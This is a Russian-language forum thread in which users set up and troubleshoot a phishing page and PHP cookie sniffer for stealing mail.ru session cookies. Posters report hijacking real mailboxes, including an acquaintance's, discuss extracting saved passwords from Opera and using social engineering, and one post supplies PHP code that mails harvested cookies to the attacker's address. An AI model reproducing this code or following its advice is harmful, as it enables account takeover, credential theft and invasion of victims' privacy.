Фейк твой ни при чем, просто запостил в тему, где упоминалась mail.ru (мож кому пригодится). Звиняй, если что не так П.С. - если захочешь, то снесу ...
неннаю ,посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял ,но всё равно молодец !! ЗАчет пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7 когда вводишь пароль и наживаешь войти
Вообще-то устанавливать виртуальную машину вовсе не обязательно, что бы проверить, работает ли всё. В этой строчке защита от школьников. А вот у меня вопрос такой: Как задать разрешение не запись? Или посоветуйте хост, где можно так сделать. И вообще на видео у чела "домашний" Apache сервак. Так как быть? А! Всё, ребят, не надо. Сам допер. И кукисы и с фейка приходит! +5 Ponchik'у )))
С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???
Ты наверно забыл удалить все остальные куки от mail.ru, у меня всё работает. Это насчет первого. А насчет другого отчета - ПОБЕДА!!! Ставь + Ponchick'у! Только 1 '-' в том, что жертва обязана обязательно открыть фото прямо из браузера
хех, после видео допёрло как работает данный фейк))) гг) Хм, а ваще зачётная вещь! Только пашед на ИЕ, в опере не кушает + письмо не удаляется... -------------------- прошёл тест на знакомой, на фейк не повелась, но через куки вошёл в её мыло... вопрос терь в другом, сменить пасс или изменить данные для восстановления низя, нужен пасс... как его раздобыть? возможно ли методом "сохранить пароль" фишкой оперы, а потом из файлов оперы вытянуть его? прога у меня есть... только не могу потестить, я отключил запоминалку паролей для мыла.ру (((
to Ponchik , спасибо с меня ++ )) А возможно сделать что-б работала тема и на мозилу? а то просит скачать сцуко (
добавил "оповещение на мыло", когда жертва прошла сниффер, на мыло придут куки... каму над: в mail-sniffer.php, в куске работы снифера (до "}else{") вставляем код и меняем мыла на свои: Code: $from = "[email protected]"; // от кого письмо $to = "[email protected]"; // кому присылаем данные $subj = " Куки"; // тема письма $body = " Cookie: $cookie"; // тело письма $from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"; $from=convert_cyr_string($from,"w","k"); $to=convert_cyr_string($to,"w","k"); $subj=convert_cyr_string($subj,"w","k"); $body=convert_cyr_string($body,"w","k"); mail($to,$subj,$body,$from);
что за ерунда может быть, обычно нормальные куки, все заходит под ними, а щас какаято ерунда: и не заходит под ними.. :/ меня смущает минус в конце.. в чем дело?
вот вопрос тоже на счёт куков... в строке с Mpop есть следующее: Code: geo_city_id=xxxx; где можно расшифровать город? гуглил, ничего не нашёл...
Итак, может я и новичок, но последнюю неделю я в этом деле очень поднялся. C минусом мне тоже приходило, все работает. Другое дело, что вам приходит не зашифрованный пароль, а некий хеш сессии. А она не долговечна (У mail.ru около часа). Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь. Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках, иначе самому надо размещать и настраивать sendmail а это не приведи господь... Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.
ну эт да, я на платнике сижу (ресселер), пока живой)) а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит) ща например весь день захожу на мыло под куками, а вот пасс не наю =\ своим оповещение доволен... а вот на счёт логов... приходиться сразу лезть через ftp и смареть... хорошо бы на сам деле сделать удобный просмотр!
Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д. А про мой скрипт - к 3 часам ночи допишу)))